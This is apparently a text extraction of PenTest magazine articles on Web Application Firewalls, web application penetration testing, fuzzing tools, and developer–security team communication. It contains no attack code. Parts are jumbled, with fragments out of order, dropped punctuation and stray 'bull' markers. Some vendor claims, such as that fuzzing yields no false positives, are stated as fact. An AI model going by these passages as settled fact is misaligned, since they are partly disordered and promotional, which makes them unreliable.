While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.

Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One Example
Attackers know that a certain commercial shopping-cart program is widely used in online shops and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, operating system, or database from web applications that give away information freely. The attackers then only have to evaluate this information, which gives them an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to retrofit older web applications to the required standards.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. Consider a program that has until now not processed its inputs and outputs via centralized interfaces and is to be enhanced so that the data can be checked. It is not sufficient to just add new functions: the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing mistakes. Another example is programs that do not use only the session attributes for authentication. In this case it is not straightforward to update the session ID after login, which makes the application susceptible to session fixation.
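The session-fixation defense mentioned above (issuing a fresh session ID at login) can be sketched in a few lines of Python; the `SessionStore` class and its method names are illustrative, not taken from any particular framework:

```python
import secrets

class SessionStore:
    """Minimal sketch of session-ID regeneration at login."""

    def __init__(self):
        self._sessions = {}  # session_id -> session data

    def create(self):
        """Issue an anonymous, pre-login session."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, sid, username):
        """Regenerate the session ID on login, so a fixated
        pre-login ID becomes worthless to an attacker."""
        data = self._sessions.pop(sid)  # invalidate the old ID
        data["user"] = username
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def user(self, sid):
        return self._sessions.get(sid, {}).get("user")
```

An application that keeps the pre-login ID after authentication skips the `pop`/reissue step, which is exactly the weakness described above.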
If existing web applications display weak spots (and the probability is relatively high), then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by an unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time, and by then correcting the errors is again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good programming that sensibly combines effectiveness, functionality, and security still has top priority: the more safely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communication at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably reduces the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have its security functions checked by penetration testers. This might reveal, for example, that the system can be abused for SQL injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
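A hedged sketch of why character filtering alone is unreliable: a WAF rule that strips inverted commas defangs the classic quoted payload, but an injection into a numeric context needs no quotes at all (the function and payloads below are illustrative):

```python
def strip_quotes(value):
    """Naive WAF-style rule: drop single and double quotes."""
    return value.replace("'", "").replace('"', "")

# Classic quoted payload: the filter removes the quotes it relies on.
classic = "' OR '1'='1"

# Numeric-context payload, e.g. for  WHERE id = <value> : no quotes
# are needed, so the filter passes it through unchanged.
numeric = "1 OR 1=1"

assert "'" not in strip_quotes(classic)   # quoted payload defanged
assert strip_quotes(numeric) == numeric   # numeric payload untouched
```

This is why the article stresses that blindly filtering special characters does not prevent every attack based on the SQL injection principle.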
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase performance for the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an input pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can also be checked in this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters, and the permitted value range.
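The general parameter rules described above (maximum length, valid characters, permitted value range) might be modeled like this; the rule table and parameter names are invented for illustration:

```python
import re

# Illustrative per-parameter rules, as a WAF policy might define them.
RULES = {
    "quantity": {"max_len": 3, "pattern": r"^\d+$", "range": (1, 999)},
    "coupon":   {"max_len": 10, "pattern": r"^[A-Z0-9]+$"},
}

def check_param(name, value, rules=RULES):
    """Return True only if the parameter satisfies its rule."""
    rule = rules.get(name)
    if rule is None:
        return False                     # unknown parameter: block
    if len(value) > rule["max_len"]:
        return False                     # too long
    if not re.match(rule["pattern"], value):
        return False                     # forbidden characters
    if "range" in rule:
        lo, hi = rule["range"]
        if not lo <= int(value) <= hi:
            return False                 # outside permitted range
    return True
```

Even these coarse rules would reject an injection payload such as `5; DROP TABLE users` in a numeric field purely on length and character class.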
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL poisoning. Fully developed rules for access rates, with finely adjustable guidelines, also eliminate the negative consequences of Denial of Service or brute-force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan, or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2: An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application; such approaches quickly become outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g., for standard applications like Outlook Web Access, SharePoint, or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order-entry page.
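The combined whitelist-plus-blacklist approach can be sketched as follows, assuming a tiny learned whitelist and two blacklist signatures (all rules here are illustrative, not a real WAF policy):

```python
import re

# Learned whitelist: for high-value pages, only these parameters exist.
WHITELIST = {"/orders": {"item_id", "qty"}}

# Blacklist: known attack signatures, applied everywhere.
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select")]

def allow_request(url, params):
    """Return True if a request passes both rule sets."""
    # Whitelist check: unknown parameters on a profiled page are blocked.
    if url in WHITELIST and not set(params) <= WHITELIST[url]:
        return False
    # Blacklist check: known signatures are blocked on every page.
    return not any(rx.search(v) for v in params.values() for rx in BLACKLIST)
```

The whitelist catches tampering on the profiled order page, while the blacklist still blocks obvious payloads on pages the profiler has never learned.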
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate, based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode, the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks, even after the security checks have been conducted.
By far the safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages to HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests into the web application's hidden URLs. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer-7 rules (to fend off Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are awarded only those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory, or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, and easy to understand and set, this in practice makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center with which administrators can manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses that the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance, and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest:
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22nd
WEB APP SECURITY
• Authentication and Session Management (session ID flaws) vulnerabilities
• Cross Site Scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of Service (if required)
• Configuration management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, the above vulnerabilities are tested, except those that could cause Denial of Service conditions, which are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is halfway done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing:
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanner usually examines or probes each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to identify the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
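The basic TCP connect scan that such tools perform can be sketched with Python's standard library; run it only against hosts you are authorized to test:

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept TCP connections."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Real scanners add UDP probes, OS fingerprinting, and timing tricks to evade intrusion detection, but the core inventory step is this loop.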
Vulnerability Scanners
While port scanners only produce an inventory of the available services, vulnerability scanners attempt to exercise vulnerabilities on their target systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, or Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browsers used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields, and other data used by the web application, and attempt to manipulate their values to trick the application.
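The tampering step an assessment proxy automates can be illustrated offline: rewrite one field of an intercepted URL-encoded POST body before it is forwarded (the field names below are invented for the example):

```python
from urllib.parse import parse_qs, urlencode

def tamper_body(body, field, new_value):
    """Rewrite one field of an intercepted urlencoded POST body."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    params[field] = new_value
    return urlencode(params)

# A hidden "price" field captured in transit, then manipulated the way
# a tester would in an interception proxy before forwarding.
intercepted = "item=book&price=29.99&is_admin=0"
modified = tamper_body(intercepted, "price", "0.01")
```

If the server honors the tampered `price`, the application trusts client-side data it should have recomputed server-side, which is exactly the class of flaw this technique exposes.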
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, in which traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as feedback and a reporting feature for the test results.
• Extensibility – The tool should be customizable and must provide scripting language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure flexibility in the implementation process.
• Documentation – The tool should provide proper documentation with a clear explanation of the probes performed during the penetration testing.
• License flexibility – A tool that can be used without specific constraints, such as a particular range of IP numbers or license limits, is better than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Data sent by the browser can never be trusted (e.g., submitted form data, uploaded files, cookies, XML data, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – To avoid Cross-Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from its own web form, it is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow certain guidelines for hardening web servers. Some of these guidelines are: maintain and install proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect any stored passwords.
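As a hedged illustration of the sanitization advice above, the sketch below pairs parameterized SQL (for database input) with output encoding (for the browser); the table and function names are invented:

```python
import sqlite3
from html import escape

def find_user(conn, name):
    """Placeholder binding keeps attacker input out of the SQL grammar."""
    return conn.execute(
        "SELECT id FROM users WHERE name = ?", (name,)
    ).fetchall()

def render_comment(text):
    """Encode on output so <script> renders as text, not markup."""
    return "<p>" + escape(text) + "</p>"

# Toy in-memory database for the example.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")
```

A payload like `' OR '1'='1` simply becomes a (non-matching) literal name, and injected markup is neutralized before it reaches the browser.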
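The form-origin check described in the CSRF guideline is commonly implemented with per-session tokens; here is a minimal sketch using an HMAC over the session ID (the key handling is simplified for illustration):

```python
import hashlib
import hmac
import secrets

# Server-side key; in practice this would be managed, not generated ad hoc.
SECRET = secrets.token_bytes(32)

def csrf_token(session_id):
    """Token the server embeds in each form it serves."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def valid_submission(session_id, submitted_token):
    """Reject submissions whose token does not match the session."""
    return hmac.compare_digest(csrf_token(session_id), submitted_token)
```

A forged cross-site request cannot supply a matching token, because the attacker never sees the token tied to the victim's session.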
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system; it determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue over time to reduce both the uncertainty of determination (i.e., false positive results) and the potential to miss some issues (i.e., false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot be used as a complete replacement for manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, particularly for the logical vulnerabilities that automated testing does not find.
Finally, it is important to point out that over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope, and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than manual human testing of these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply cannot be trusted at that scale.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target, the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.
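The core idea (derive anomalous variants of a valid input and watch the target for abnormal reactions) can be sketched as follows; the mutations below are a toy subset of what a real fuzzer generates:

```python
def anomalies(valid):
    """Yield simple anomalous mutations of a valid input string."""
    yield ""                          # empty input
    yield valid * 1000                # oversized input
    yield valid + "\x00"              # embedded NUL byte
    yield "%s%s%s%n"                  # format-string probe
    yield "A" * 65536                 # classic overflow probe
    for i in range(len(valid)):       # single-character bit flips
        flipped = chr(ord(valid[i]) ^ 0xFF)
        yield valid[:i] + flipped + valid[i + 1:]

def fuzz(target, valid):
    """Return the inputs that make `target` raise an exception."""
    failures = []
    for case in anomalies(valid):
        try:
            target(case)
        except Exception:
            failures.append(case)     # a crash here is a real finding
    return failures
```

Because a finding is an observed crash rather than a pattern match, there are no false positives, which is the point made above.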
Documented test cases – When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation – All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts – Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box – If the requirement for testers is to do fuzzing, they almost always choose the quick-and-dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in the software.
Using hardware test beds – Appliance-based fuzzing tools become outdated very fast, and the speed requirements for the hardware increase each year. Software-based fuzzers scale in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.
Unprepared for the cloud – A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites – Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use – Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated – Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage – Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two respects: specification coverage and anomaly coverage.
Scalable – Time is almost always an issue when it comes to testing. The user must also have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and can select other test completion criteria.
Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little bit everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand-new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers for something like give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architectures are not designed with security in mind, and in project Gantt charts there usually
are no security checkpoints included for code testing, nor time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone remembers something about security: Hey, we need to get this online, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on application delivery. Reports usually contain just the symptom. For example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before use. The report does not contain all
Developers are from Venus, Application Security guys from Mars
We know that Application Security people talk a different language than developers do, whether we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal: building secure code.
WEB APP SECURITY
Page 20-21, http://pentestmag.com, 01/2011 (1) November
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not open source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
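The value of such a library is easiest to see with output encoding, one of the controls a library like ESAPI centralizes. As a rough plain-Ruby sketch (the helper name h is borrowed from Rails; CGI is from the standard library; this is an illustration of the idea, not ESAPI's actual API):

```ruby
require 'cgi'

# A centralized escaping control: every value interpolated into HTML
# goes through one library call, so an injected <script> tag is
# rendered as inert text instead of being executed.
def h(text)
  CGI.escapeHTML(text.to_s)
end

puts h("<script>alert(1)</script>")
# => &lt;script&gt;alert(1)&lt;/script&gt;
```

Developers keep writing ordinary view code; the security team only has to verify that the one helper is used everywhere, which is exactly the shared language this article argues for.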
The required effort is minimal compared to translating an implement a filtering policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy.
There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write most of your test beds using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: in the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code should deal with malformed input. Then the development team corrects the code until it passes all of the test cases; when testing is complete and all tests pass, your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
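To make the scenario idea concrete, here is a minimal sketch in plain Ruby (no gems, so the behavior is visible at a glance) of what such a scenario would pin down; the sanitize helper and its whitelist are hypothetical, standing in for whatever filtering policy the report recommends:

```ruby
# Hypothetical filtering helper the BDD scenarios would drive into
# existence: keep only characters expected in a search term.
def sanitize(input)
  input.to_s.gsub(/[^\w\s-]/, '')
end

# "Scenario: malformed input is neutralized before reaching the query",
# expressed as plain assertions rather than an rspec example block.
raise 'quote survived' if sanitize("name'; DROP TABLE users;--").include?("'")
raise 'benign mangled' unless sanitize('plain search term') == 'plain search term'
puts 'filtering policy scenarios pass'
```

In a real project these assertions would live in rspec/cucumber files; the point is that the remediation statement becomes executable, so both teams can watch it go from red to green.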
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process: they use a language with no common ground, which further confuses or annoys everyone and pushes the groups even further apart.
Communications Breakdown: You Give Me The Report
